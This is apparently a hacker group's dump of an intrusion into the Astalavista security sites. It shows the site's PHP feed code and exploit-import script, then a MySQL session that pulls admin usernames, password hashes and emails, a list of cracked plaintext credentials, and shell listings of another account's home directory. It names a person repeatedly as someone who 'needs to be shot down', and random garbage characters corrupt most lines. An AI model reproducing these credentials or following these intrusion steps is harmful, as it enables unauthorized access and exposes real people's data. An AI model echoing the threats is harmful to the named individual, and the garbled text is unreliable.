- v" U' m3 ]; n: f <title>ASTALAVISTA.com - Exploits</title>0 a0 k [. D# `( X$ j9 b, W4 {; Z
<link>http://www.astalavista.com/exploits</link>2 s! r, J' m3 M" `
<description>All availably Exploits.</description>
1 K0 C$ D! x' m& O <language>en-us</language>
' e- l1 t( Z0 V <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>3 z* q- ~. [1 @# x
<docs>http://blogs.law.harvard.edu/tech/rss</docs>/ O$ t4 d( i/ @5 w* i
<generator>Astalavista.com</generator>3 W5 M3 r$ F+ [7 D* L' R
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
9 i7 |! a, m$ M7 C' N& |+ }+ }! Y </channel>
- |8 X, t9 u/ _/ m+ F</rss>’;! v) o0 ]! e4 ]* h4 {+ y6 P/ L
0 d1 q9 ?9 `: Z. ?# x
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
# B6 C+ g+ d8 \3 c- b" p, c unlink (FULLPATH . ‘/feed/exploits.xml’);
: U+ r+ k \" b$ U }
! [: L+ O! I# t1 V' M1 @, A* r& ^4 t7 N7 ^ D. k6 l
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);* p! H5 R* H3 E$ ?6 i5 l
[snip]
7 T0 w# C. u- |' x" y. t, v9 d$ Z9 t( A- l9 Z0 @8 ~1 ^
sh-3.2$ cat exploits.sh
: c) N' f! w% I4 b. J! Y#!/bin/sh* \6 m4 ], @, h
& k% o6 _5 z0 o5 z& `" _2 Q###########################################################
+ T! z7 A; p$ ?3 y# #% P3 I, ?. \( D. U% X
# Title: milw0rm exploits adder #
/ t1 z5 f: ?1 h6 e# Description: Add all milw0rm exploits to the # ]6 n6 A$ |- o: m& z
# Astalavista.com database #) G/ i4 e( F! J
# #/ z4 T8 @' @( C
# Company: Astalavista Group #
$ ^. n& b! T/ m7 j q3 O3 H, a- ~# Author: Paulo M. Santos #+ E0 {0 h, p1 V/ Q
# E-Mail: 链接标记paulo.santos@astalavista.ch #
) V) s- Q4 u2 Y# #
8 @6 E/ b& U8 a6 A4 }###########################################################
9 k$ ]. }5 j2 K4 N' ^2 Y' g+ B# R$ L: c% t; V
# path
$ u- h2 H& x5 z( H' ethis_path=/home/com/public_html/modifications/cronjobs
/ L. x( H) f$ a2 {# z( a
: Q- p/ a5 c& e3 L, r; D# change directory: ]4 l. F, T" x# n; T. q# s3 H
cd $this_path, N; }) X% R6 m5 O2 h; b/ m. n
cd tmp/
2 k6 E: I2 t' G
* n2 ?3 y+ e" ^2 h$ y# delete files
: ~0 h4 T# V" orm -rf milw0rm.tar.* &* q0 g4 W- |& @6 N
rm -rf milw0rm/ & j5 X, ?8 {' I8 h! ?
8 B( |+ z/ C1 o8 I% Q7 z
# wget milw0rm paket8 f/ t0 J% u! b9 }) \2 N
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]* V* g! ]$ f1 } N
4 U' w2 h) |; b9 ~2 q) Q# O# extract milw0rm paket
) Z% ?8 U. m$ j4 c! ?: Dtar -xvf milw0rm.tar.bz2
1 m6 o7 {( Z" \: d
5 K& |( H7 F% ?, e% B% r5 y( T/ H6 v# change owner) @/ u2 Z! P- S; E0 d
chown -R com .
( \6 P1 B5 H* ?7 B# i- achgrp -R com .
4 V. }3 {" T9 x, v8 R& A3 M1 x! Z
# execute php script7 u) l& b* G& S* ^: t) X2 w; j% Z5 M d
cd $this_path
% J* F# t8 k8 ^2 c8 x& uphp -q exploits.php1 T% T) r- J+ V/ ?
3 U+ O; i* G! \5 {7 ]" `
# delete files
# C/ A; J0 c3 E! i8 b- arm -rf tmp/milw0rm.tar.*
# @$ e$ q+ k1 t7 _+ h/ o: c3 `rm -rf tmp/milw0rm/
$ ]% A4 H, T8 f+ M6 A0 r" |
6 i; @1 K6 Q! V: N) O: b6 psh-3.2$ echo “Paulo M. Santos needs to be shot down.”
, Y8 h5 ^6 `$ ~Paulo M. Santos needs to be shot down.
. b0 d* y4 K, C, E4 M, q4 p1 v/ j/ U
mysql -u contrexxuser2 -p
B0 w8 z1 L7 X) OEnter password:" S, F/ G6 `, C9 L* y, N* a
Welcome to the MySQL monitor. Commands end with ; or \g.
& H$ M' P6 e7 v1 v7 DYour MySQL connection id is 261694
+ @7 a: [. B$ w6 zServer version: 5.0.45-community-log MySQL Community Edition (GPL)
: }: C9 o" A, j% Y
* }' \7 N& @. w& h2 \7 d" q8 |Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.# r/ O# l4 W# P; d
! Y h, k7 y% _4 f2 w
mysql> show databases;' F( D# \0 k: r
+——————–+0 t. m( p- ^, B& x4 m0 E: p# d
| Database |
- F" F# w" X6 S$ ?; S& o+——————–+9 ]" C$ S- l# L+ H6 z
| information_schema |
& e1 _$ B' W& P1 t| com_contrexx2 |8 F4 ]3 O& w! b) ?2 h4 _. ^
| com_contrexx2_live |
- _8 t2 b1 e6 F: Y| test |
$ \- q$ S5 ?6 x( j; G2 g+——————–+
; ^6 V* n4 L. G! ~4 rows in set (0.00 sec)! \2 k Z3 z- n0 s+ | ~
K- J! h, F% V+ l% l# ~mysql> use com_contrexx2_live% r0 C' k1 L. D0 l* x
Database changed/ @% P0 E9 U, g( P) @
mysql> show tables;/ M! ?# @9 s5 k; k. s
+————————————————–+
0 q9 l0 k. W( Z) V| Tables_in_com_contrexx2_live |' R2 l4 d- v. ]3 y- O: R
+————————————————–++ T8 N" g- |' G8 v# j7 G" Z/ |
| cc_banner_counter |* z7 W% t3 Y$ w' t' h* |
| cc_search_counter |* F1 |+ q$ h- d9 m8 s! r' \4 t0 `1 ?
| contrexx_access_group_dynamic_ids |4 Z/ t* c+ R% [# v, y: @5 a
| contrexx_access_group_static_ids |
- E8 e9 z& q5 O* d. J3 e( ^9 a7 A& M| contrexx_access_rel_user_group |6 Q$ ^8 |# U* j' ~2 T3 v0 r' b& ?$ _
| contrexx_access_settings | t! S5 b' c: M
| contrexx_access_user_attribute |1 D# f. s) U+ w% S2 L
| contrexx_access_user_attribute_name |% t& u# T( C. [; l' v; h
| contrexx_access_user_attribute_value |! I$ L1 N% H) M. H0 {
| contrexx_access_user_core_attribute |5 h6 R# r- S1 }% ?
| contrexx_access_user_groups | q& {. T+ o5 R3 |* P# K0 w
| contrexx_access_user_mail |- d$ h9 S" ]% L3 |2 K5 T3 a
| contrexx_access_user_profile |
) n; y# b( y2 ~# A8 h3 |0 `8 K| contrexx_access_user_title |
: y* c9 U1 r* |# D| contrexx_access_user_validity |
1 l6 i2 i2 a* S4 b4 {2 @* E( O7 R" z6 T6 c| contrexx_access_users |/ V! y, R& {3 k0 P' z
| contrexx_backend_areas |
5 R$ B4 _/ q8 ?. H$ B| contrexx_backups |6 B7 ^. K1 W. R7 d( F% _
| contrexx_content |
- }9 C8 `4 w- y" _+ A2 [, u1 s| contrexx_content_history |6 Y. F( G/ y# B( f" G. @4 D
| contrexx_content_logfile |8 t1 p, k t* F
| contrexx_content_navigation |
, E% L% r1 A% ~8 T| contrexx_content_navigation_history |- g7 l4 Q; ]: \7 E: S( V
| contrexx_ids |2 M8 [7 q. @$ V3 m6 Y3 M$ Y& M9 D1 m
| contrexx_languages |
- C0 u6 r# @3 n0 L| contrexx_lib_country | i& a" U. z# _9 X+ b+ ] ?8 c
| contrexx_log |. X, q1 [) N, |
| contrexx_module_alias_source |
& S [0 `% _. U n1 }- D- C8 I6 g| contrexx_module_alias_target |
# c! s1 R8 u2 j% ?. R| contrexx_module_block_blocks |
2 u& V" T7 [5 a) z| contrexx_module_block_rel_lang |5 f8 u P! s+ J. y- o& T
| contrexx_module_block_rel_pages |" Y6 H: ]7 k8 g, f2 k
| contrexx_module_block_settings |
) S1 [3 r" A$ o4 r4 r| contrexx_module_blog_categories |4 w" j! a F1 p' D6 h
| contrexx_module_blog_comments |
9 n |% y e' k5 {5 X/ i| contrexx_module_blog_message_to_category |
- c# C( c v1 S( ~5 m! k5 L0 W| contrexx_module_blog_messages |
+ X7 K* T5 i7 b% p% V4 m) T| contrexx_module_blog_messages_lang |
6 d4 {( z( {/ Z| contrexx_module_blog_networks |+ z: W4 `3 k9 E. L; \
| contrexx_module_blog_networks_lang |" ~7 O" Q/ K* K0 @6 `
| contrexx_module_blog_settings |5 D2 B" U8 |: i4 A5 C! O, R
| contrexx_module_blog_votes |
! {1 z) ^$ d9 ~* P| contrexx_module_calendar |- `+ @+ f& [6 r# p# }
| contrexx_module_calendar_access |# }5 R& w4 t4 g! R
| contrexx_module_calendar_categories |% ^$ j' Z: d' v) J
| contrexx_module_calendar_form_data |
! y* G5 Z! |6 B U( n- {* Q& Q| contrexx_module_calendar_form_fields |
2 N# t( h H2 ?# i8 j6 b. l| contrexx_module_calendar_registrations |3 Q, y1 T8 z- h( h
| contrexx_module_calendar_settings |7 b: ?" E, o9 s3 y; x% F2 C, |
| contrexx_module_calendar_style |) d, q- M, R) F: d/ f9 ]
| contrexx_module_contact_form |- O2 h. |% Y: c& ^% V1 a0 g1 p
| contrexx_module_contact_form_data |+ S5 f! E0 x( T c3 C
| contrexx_module_contact_form_field |
) E7 |4 [, G# J% W1 B8 e| contrexx_module_contact_settings |
# u5 ^1 S3 i; ?4 B3 @| contrexx_module_data_categories |" t# u }/ ^# O
| contrexx_module_data_message_to_category | |% A/ P# M) ^* T
| contrexx_module_data_messages |* ~ G" q7 H1 @# R) s
| contrexx_module_data_messages_lang |
9 L- B! I4 H& I# h5 P| contrexx_module_data_placeholders |
" _& t9 i* |1 x1 y| contrexx_module_data_settings |) c) w1 [3 S0 J0 h- J! H
| contrexx_module_directory_access |/ r8 r, {; K% `9 ^$ w1 a
| contrexx_module_directory_categories |
/ W( O' A; ?9 Y4 D! T| contrexx_module_directory_dir |! T1 q1 d$ u7 E
| contrexx_module_directory_inputfields |, I; Y6 w2 d2 b5 i% N N3 E
| contrexx_module_directory_levels |
8 G, s' f5 Z0 b| contrexx_module_directory_mail |0 o+ q8 d2 K& a& E. F$ U
| contrexx_module_directory_rel_dir_cat |, X0 Z1 K; ? i E, B& l
| contrexx_module_directory_rel_dir_level |; j- }& }! S0 @
| contrexx_module_directory_settings |6 `& ?; ]" G! [" s- a0 U
| contrexx_module_directory_settings_google |' N$ k8 O! G$ {
| contrexx_module_directory_vote |
B/ W/ m6 X" ]4 s9 ^| contrexx_module_docsys |
$ v J9 a% ]9 |: q! a| contrexx_module_docsys_categories |) m v* n5 @6 C9 t4 X3 @7 _1 @
| contrexx_module_egov_configuration |/ E) {7 L& i2 e( j
| contrexx_module_egov_orders |
, s$ R+ X0 L: i1 T' B| contrexx_module_egov_product_calendar |
+ u D9 A4 H7 ]; T. D| contrexx_module_egov_product_fields |
1 ^1 R% H) A/ X7 T| contrexx_module_egov_products |
6 G0 C0 Z! X8 ?6 R! I; [( j| contrexx_module_egov_settings |
) [3 f# E/ h0 g2 d' G| contrexx_module_exploits |
/ l( `$ w3 @+ } c2 Y- X* \| contrexx_module_exploits_categories |
, j1 C- n @6 w# K6 {( c| contrexx_module_feed_category |; _) o! e0 U, C. [; K
| contrexx_module_feed_news |7 [& l- o0 r A8 _. t: W1 A% z
| contrexx_module_feed_newsml_association |4 @# p: }+ d1 ~! {9 x" [2 }
| contrexx_module_feed_newsml_categories |
: N1 H5 _1 G( e: F: C* ~| contrexx_module_feed_newsml_documents |
" a/ q6 z; d1 B! R) x| contrexx_module_feed_newsml_providers |
6 ?6 F* Y$ O8 V+ H4 l| contrexx_module_forum_access |0 k3 P# x2 d( Q) X
| contrexx_module_forum_categories |
4 y" O" X% Z% |: N3 F- |+ V" D| contrexx_module_forum_categories_lang |
: {3 }- R i6 \ t, t. e. z| contrexx_module_forum_notification |
0 p9 c0 _& h: A) g6 s( f; y9 {| contrexx_module_forum_postings |0 T. ~6 H, n- z- w
| contrexx_module_forum_rating |
0 I% |; r7 v, V2 I| contrexx_module_forum_settings |2 V8 G, r1 I# S+ J8 U: h
| contrexx_module_forum_statistics |
0 L0 W, y; N7 I' O| contrexx_module_gallery_categories |
( `) f& p) x2 ~9 ]* A% C+ D| contrexx_module_gallery_comments |, {) @ e# W0 e. p
| contrexx_module_gallery_language |
8 D% v( l6 r# V) x1 ^. L| contrexx_module_gallery_language_pics |
' Q" b! _/ k5 z1 |4 K% a| contrexx_module_gallery_pictures |
( e; i! R. ^+ f, E) w| contrexx_module_gallery_settings |
. r9 N8 J3 a v1 c, S8 F| contrexx_module_gallery_votes |5 ^0 @6 x% _; x0 w# E; {
| contrexx_module_guestbook |
$ p4 E' D$ Y3 F% O* k| contrexx_module_guestbook_settings |
( D$ t9 e$ |/ m5 n+ x5 W| contrexx_module_livecam |
# g1 `6 `( b: c4 v( o6 E. A7 z" W' y& || contrexx_module_livecam_settings | p7 h6 o; {/ j0 m2 k
| contrexx_module_market |
$ v) W( [/ ?& ~2 i| contrexx_module_market_access |( u- i6 }1 u& P$ f) a: z4 H9 }/ ?
| contrexx_module_market_categories |
6 H+ _. A, L! b' I* W0 d1 n| contrexx_module_market_mail |7 A: L$ d# u, L- O7 W, [: r
| contrexx_module_market_paypal |
+ G1 U1 b" ~, _# v% C5 h9 r" p| contrexx_module_market_settings |; F; _" r$ L) {/ n' N0 s
| contrexx_module_market_spez_fields |! t @( `: O# a/ g: N$ u
| contrexx_module_mediadir_access |9 ?. d! A) U4 U0 }$ M
| contrexx_module_mediadir_categories |
$ \! u/ M0 c; v: W% N0 m! s; P/ w| contrexx_module_mediadir_comments |" |4 m) U3 L( h0 b
| contrexx_module_mediadir_dir |
* B) \6 q* ~% t4 L9 G1 C| contrexx_module_mediadir_inputfields |" V% s& I: X6 @6 g0 Q+ x
| contrexx_module_mediadir_levels |( f0 ^7 D1 w& F4 n* |+ k- ]
| contrexx_module_mediadir_mail |! y; x Z: ~6 [4 T- b/ A
| contrexx_module_mediadir_rel_dir_cat |
3 \- \5 B7 L9 Y* N( f; y4 J| contrexx_module_mediadir_rel_dir_level |7 c; Z8 b. z9 s1 E1 u, |7 Z
| contrexx_module_mediadir_reports |
1 O& q) m7 @9 @- [, f8 s4 h0 O| contrexx_module_mediadir_settings |5 z5 H* F6 t" L0 Q5 P
| contrexx_module_mediadir_settings_google |- n9 `" L/ i u5 b, V& r
| contrexx_module_mediadir_vote |
( G# `6 \7 q1 O# h- `0 n% I: u$ x2 }| contrexx_module_memberdir_directories |9 m1 w+ j2 X1 ]% ~4 k. P, n8 I c
| contrexx_module_memberdir_name |
* x( S; T; Y5 |" ^" b p# e% h| contrexx_module_memberdir_settings |: Y# a) @8 ~" m: L
| contrexx_module_memberdir_values |9 j) m/ J, Y$ W0 M& d4 T" \
| contrexx_module_nettools_allowed_groups |$ O, M, l9 D" C6 }! @# U( P
| contrexx_module_nettools_settings |
' o" H7 g, a8 W3 l. t% X9 I. W| contrexx_module_news |
- L8 F; h: e* G, J. w| contrexx_module_news_access |, Z$ U- ~+ R- c) C, x) |) h
| contrexx_module_news_categories |
# a9 w% Z) [9 R5 C| contrexx_module_news_settings | X2 g+ ~$ a% k! T# l, c" r
| contrexx_module_news_teaser_frame |
( l, i+ A0 g% ^, u! q( k| contrexx_module_news_teaser_frame_templates |, l$ e3 j+ @2 ^0 n
| contrexx_module_news_ticker |# ~ F: r+ \+ Q2 Z
| contrexx_module_newsletter |& \$ o+ K: L& B i
| contrexx_module_newsletter_attachment |
' c/ M* s o7 X5 A| contrexx_module_newsletter_category |, \: h5 P8 p" O% E
| contrexx_module_newsletter_confirm_mail |) ^/ A# G1 m: g
| contrexx_module_newsletter_rel_cat_news |
2 Z0 K4 b- x' H$ G| contrexx_module_newsletter_rel_user_cat |
: K2 K5 y/ W& {: `% Q( o" J- W| contrexx_module_newsletter_settings |# K# ]9 N c1 j0 Z% ~9 M
| contrexx_module_newsletter_template |( p, f0 |* P/ F- F6 ~& z, d
| contrexx_module_newsletter_tmp_sending |
$ w3 Z) a# A3 B5 S| contrexx_module_newsletter_user |9 n5 I7 n& O a( t' v1 @3 a
| contrexx_module_newsletter_user_title |2 J: C" D% [% H
| contrexx_module_onlinetools_defaultports |9 m2 K, y! Q) A4 q4 _# X8 }
| contrexx_module_onlinetools_defaultports_back |
V& s9 ]; X7 f- Y| contrexx_module_onlinetools_geolitecity_blocks |
- D2 o9 l# b& ]$ N| contrexx_module_onlinetools_geolitecity_country |! L! _+ q# R2 u4 N, c
| contrexx_module_onlinetools_geolitecity_location |
% b& K: `& D" t| contrexx_module_podcast_category |
* n/ A7 v% y' I| contrexx_module_podcast_medium |
) P& c' i+ Q2 q( [. J| contrexx_module_podcast_rel_category_lang |
' B5 C) {$ Z. ~" F( K| contrexx_module_podcast_rel_medium_category |0 a9 T6 t+ ^ E% R
| contrexx_module_podcast_settings |
c; d- w' M/ || contrexx_module_podcast_template |
' P) h' u; G1 d" y! N- J2 o9 C' }| contrexx_module_proxydb |
* ?1 L" e0 t% l( A| contrexx_module_recommend |$ p6 B5 M4 g; s& b5 @
| contrexx_module_repository |% f4 e0 V8 i1 ~/ n7 R* s" q1 o" _
| contrexx_module_securitynews_cats |4 v1 Z, u$ \+ r
| contrexx_module_securitynews_feeds |- L3 v) w `. o" ?
| contrexx_module_securitynews_news |
8 O6 \9 s5 `" l9 s| contrexx_module_shop_categories |
! _9 g1 I9 ~/ c" {; P3 R# K& E| contrexx_module_shop_config |5 K2 U3 [& |9 n! C4 r
| contrexx_module_shop_countries |
^9 M$ \9 H* p6 n& ]+ b1 L i; t| contrexx_module_shop_currencies |
+ [4 r$ P$ B+ h0 a% }; S) j| contrexx_module_shop_customers |5 o: _: o, C. N$ `* h# [) N+ x
| contrexx_module_shop_importimg |
0 G0 R; Z4 @( p' I; h7 p. M8 }| contrexx_module_shop_lsv |. r: |1 @$ {& ?$ A6 e5 [- e0 d" z
| contrexx_module_shop_mail |
/ v1 o, r( E& N| contrexx_module_shop_mail_content |# M, Y; J5 q! w$ M
| contrexx_module_shop_manufacturer |
/ P9 x/ K; d0 y, N| contrexx_module_shop_order_items |
: S Q+ @& L. \; V- Y| contrexx_module_shop_order_items_attributes |; Z/ n! f* U9 I1 w2 z; S) ^
| contrexx_module_shop_orders |
/ J d9 z+ H z| contrexx_module_shop_payment | r4 G' l, B" s
| contrexx_module_shop_payment_processors |
' c8 I. x6 G2 @# o! \9 @, X| contrexx_module_shop_pricelists | x3 E- s& q6 K0 Y9 C5 b: J7 i
| contrexx_module_shop_products |
* _/ M) ]2 M, R| contrexx_module_shop_products_attributes |
, p, }. B. r$ h' A: m% [| contrexx_module_shop_products_attributes_name |4 y( H0 g0 w% v! _) t( h- \) S
| contrexx_module_shop_products_attributes_value |- u) N) n! x# p/ `' ?6 P6 Q' s
| contrexx_module_shop_products_downloads |
& e; E; `7 c5 H0 A: @. O( q: w| contrexx_module_shop_rel_countries |0 h) ^) A; h* X5 T' u" w7 J' k
| contrexx_module_shop_rel_payment |7 |8 q: w4 T1 a) |" t4 _; m
| contrexx_module_shop_rel_shipment |3 @9 e% T5 y5 Y+ |& N6 I! c
| contrexx_module_shop_shipment_cost |8 Z d/ g+ M/ s5 a4 l
| contrexx_module_shop_shipper |/ x5 O! P- x$ B. u" |# t% D4 H- v
| contrexx_module_shop_vat |+ i8 C% ^5 e9 T' z
| contrexx_module_shop_zones |
0 f5 a; }/ b$ K; N0 y' [$ ]) O| contrexx_module_u2u_address_list |
* _- d5 ?1 |0 l& F| contrexx_module_u2u_message_log |) W+ M" D) C3 L4 @! O" {9 V" u
| contrexx_module_u2u_sent_messages |
5 J2 c" K3 m5 v* j6 [| contrexx_module_u2u_settings |
3 e) p2 ^; b* \| contrexx_module_u2u_user_log |
( A: M# K& b! P* ~8 [0 v2 o8 K, z| contrexx_modules |( G6 S+ \; D% q7 E5 ]& S% v
| contrexx_sessions |3 |( I8 s) r+ k4 I; j. S$ O
| contrexx_settings |
+ t6 ]/ y9 q# m/ J# s8 s9 q| contrexx_settings_smtp |
' `+ R$ p! q6 f$ X| contrexx_skins |* G! f$ p% D5 g1 z% }( l q
| contrexx_stats_browser |
. l6 f$ n9 r6 q9 |& e" E| contrexx_stats_colourdepth |
" B0 V# B- e s) S7 d3 g% w| contrexx_stats_config |0 r8 l1 Z* h( `( }; E; c
| contrexx_stats_country |
& M2 u. J+ T, U| contrexx_stats_hostname |- ^- X7 E `: M% c9 y4 ?' a4 G
| contrexx_stats_javascript |
8 F1 k8 H. O a$ S8 v| contrexx_stats_operatingsystem |
- ]# h8 @: w1 c/ `| contrexx_stats_referer |
6 G# ?4 G) { C# o: ]| contrexx_stats_requests | h$ t- K& X3 V+ v4 h2 e
| contrexx_stats_requests_summary |# F4 j2 [% g3 J- d) K0 s
| contrexx_stats_screenresolution |
5 A$ U2 J9 d) y3 y# x0 Q| contrexx_stats_search |
3 [* U+ t+ v0 I- a- W( m& @1 C| contrexx_stats_spiders |
( @' Y7 v- y( s+ s| contrexx_stats_spiders_summary |
/ j; o. Z1 _! g" @( |: [| contrexx_stats_visitors |& R+ c! T0 g/ Q
| contrexx_stats_visitors_summary |
: L" Q7 T, u9 x1 V" D. C# Y, G8 H| contrexx_voting_additionaldata |
% L: J* a0 W {| contrexx_voting_email |3 N1 }. ?+ @9 z
| contrexx_voting_rel_email_system |! x* h& I# c I4 B- g
| contrexx_voting_results |$ u# x9 ]5 c+ {; ^8 d1 k+ ]2 d( e# k
| contrexx_voting_system |# I7 w j0 M% j2 [1 ]1 ]
| foo |
* t3 E7 q3 {& ^+ ?; b+————————————————–+
0 y5 r( l6 I" X |. j. \227 rows in set (0.01 sec)4 m( M9 {: u! @+ H4 G* ^7 H
/ h& s; Z' i1 M. z3 gmysql> select count(*) as skids from contrexx_access_users;+ R7 D M: u r
+——-+
, t- D/ v: V$ W8 J9 l, ]; h| skids |" P2 u$ Q4 Z& M2 ]/ }" \
+——-+
) U5 p% E/ L9 ]. b! p| 53699 |
7 Z+ G4 K, d; a: Z2 [+——-+: H5 L" {4 x. \+ K
1 row in set (0.00 sec)
; G$ F. `: M/ i9 G3 \& y
, |7 [" E, r" F a! Q: A2 ?( hmysql> describe contrexx_access_users;
7 Y" W2 A1 O; W% I3 \9 x( D+——————+——————————————+——+—–+————–+—————-+0 a, B3 K! J# E% {
| Field | Type | Null | Key | Default | Extra |/ Q1 l( O) }5 Z4 y. a# y9 B# X. Y: G5 c
+——————+——————————————+——+—–+————–+—————-+2 ^& u" S3 w {+ h) F/ S6 ^
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |3 ?. f5 ^1 R- q6 V. z7 @
| is_admin | tinyint(1) unsigned | NO | | 0 | |/ p, p# k- y6 C6 l
| username | varchar(40) | YES | MUL | NULL | |
: j8 G% S1 [! H5 p| password | varchar(32) | YES | | NULL | |
1 l* A9 n. V6 S( F V0 z7 k| regdate | int(14) unsigned | NO | | 0 | |
/ ^) V5 D! k$ B' H) j5 z! _| expiration | int(14) unsigned | NO | | 0 | |
. j: O# z5 ^) h0 j2 j| validity | int(10) unsigned | NO | | 0 | |
" o# s6 f7 A, W8 X: L. o6 I' O/ e| last_auth | int(14) unsigned | NO | | 0 | |8 v# T3 @5 U) ]6 X
| last_activity | int(14) unsigned | NO | | 0 | |
$ D* b" v6 y& A+ f" q4 L5 K| email | varchar(255) | YES | | NULL | |; ]& \3 U- x5 Q
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
G0 \7 I3 _# L7 v) ^' a3 R! l# F5 Z| frontend_lang_id | int(2) unsigned | NO | | 0 | |
, g$ ?$ y8 J6 l" m! K% l" V: || backend_lang_id | int(2) unsigned | NO | | 0 | |2 Q b, r8 }& i4 i4 Z7 I
| active | tinyint(1) | NO | | 0 | |
1 w. ^* G- Y+ N| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |/ {2 Y/ Z* F! q& i2 ^
| restore_key | varchar(32) | NO | | | |5 C9 n3 c9 E5 p# E
| restore_key_time | int(14) unsigned | NO | | 0 | |& z" ~, B" b" D# l! F& O# _
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
( k1 H. {( t: _- y1 S# Y+——————+——————————————+——+—–+————–+—————-+. M" e- Q5 T* F; x
18 rows in set (0.00 sec)! |6 T0 `' J. E8 ?3 d' ]! G
9 |, v2 \0 W' g4 N+ s' d8 Q
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
2 }. E" R4 C! H+ M7 T+————+———————————-+—————————–+ Y. ]( \" o0 B' u$ k. O- m
| username | password | email |9 _- @6 E$ L) {! S6 x. U5 D9 Z
+————+———————————-+—————————–+
8 F" r. y1 f( k# `| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |' u7 Y0 y5 B- t- {
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
4 ]& M: y! D1 d y; M| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
, {/ r1 `! T- x9 v| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |; e7 T/ c& K; U3 G6 B
+————+———————————-+—————————–+
: t& E2 A+ _- g. @1 q! H) h4 rows in set (0.04 sec)% l& T0 r& h0 a& y* y6 S. E/ L. L
H9 l R9 P! h/ A- w/ K) x" g9 ~mysql> exit;
; c( N7 `! }) Z+ |2 o5 RBye
: w2 T" F1 w9 \: m+ @& g0 m
' A; J# H+ P- a[~] There you go, your “team of security and IT professionals” is a joke.
6 F, ^' P& _" T3 ?
9 G" W# d1 C8 `- o3 C/ u+——————————+* B$ I6 `$ M- E' @7 h2 A/ j( s
system:f82BN3+_*& f5 _ d2 W. h( l5 r
Be1er0ph0r:belerophor4astacom9 a3 `7 r: a7 W; j/ U
prozac:asta4cms!
6 [6 c& j# `& Hcommander:mpbdaagf6m0 x q4 F/ `; M4 K/ C5 U
sykadul:ak29eral8 }5 o/ A- L% Y4 G8 S" d( k1 s
+——————————+
6 w) W) ?0 M$ l# w% r, w" t! a6 N* W
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
0 }; ^) s) T8 O; v; h! C* o7 X…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it." K6 H2 \, X* p
' a3 J$ B* u s7 [8 t9 }: h
[~] Lets move to astalavista.net now,
& i3 O* d0 Z X6 }9 B/ }, C1 \& J/ C, c: a: h
From <链接标记[url]https://www.astalavista.net/[/url]>:: Y: j h* M2 A* h# U( q& T2 U) ~
>> Everyone knows that the best defense is a good offense.& W+ h; i* g! ^# s
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.3 T5 M \. R$ E
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world." h4 K5 v/ B+ Y; k1 Z" g
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
; W6 |, J l% U* L$ s. i, v# ~. u( M; ?8 j; m
>> Go ahead, try and hack our server . in a completely legal way!
" y4 B6 G$ V$ R( W6 \>> Learn by doing: We offer our members tricky tasks and challenges on an
8 a& ` Q; m% {9 W>> ongoing basis so you can test your knowledge and abilities. You can also$ R) e E1 q+ w
>> demonstrate what you.ve mastered by taking part in regular hacker contests/ m7 Y# C; n4 @. F% y- j
>> and war games. Q5 }' I; K: D8 z) |/ X
, Q: N8 B- b. V[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
* @" D4 h" P' d7 D I* B [
0 {" Z7 G4 U5 y9 t1 L( O[-] Tricky task: Find home dir of astalavista.net8 D) N+ y- A, @' f. a/ Y; U
' J6 N+ t& K, u3 e+ Z; j" ~sh-3.2$ ls -la ~astanet
. \9 t- i* w( N8 A8 [4 _$ vtotal 48
+ B% y6 a# F- v5 Y) @, Pdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .1 ]5 F3 ~/ {2 m6 @7 S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 Y+ n! R% Q! [" m2 ]
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
1 o# a- A1 p% a; k- n-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
! f* V i. F E3 W-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( o; b# m8 C3 o-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile2 G: J+ m/ E- L& ^9 _
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
# y0 ~( Q+ u. u8 i; gdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains. S& K! b/ R8 v* z- P3 }2 t: l
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
% {. }3 G$ ?6 n7 ^# p' Ldrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
1 n* w0 Q1 G; w( S& ^8 |/ Ylrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
! J1 i4 z0 L3 J& @/ ?-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
4 a9 e' B9 s! x4 t" x9 k; U' H) i% u8 k$ M e" L) E" q
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/* ?; I0 N3 p( J) n7 j; r
sh-3.2$ ls -la
6 a$ x/ b2 Q; O+ q2 ~total 200
0 }# A& f8 A( d6 T9 P5 b2 L- Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .6 j: B7 ]6 @: U: X. T1 G5 H
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
& L0 ^6 M# p% J, cdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0077 [( m% M: V! `7 [% p# C
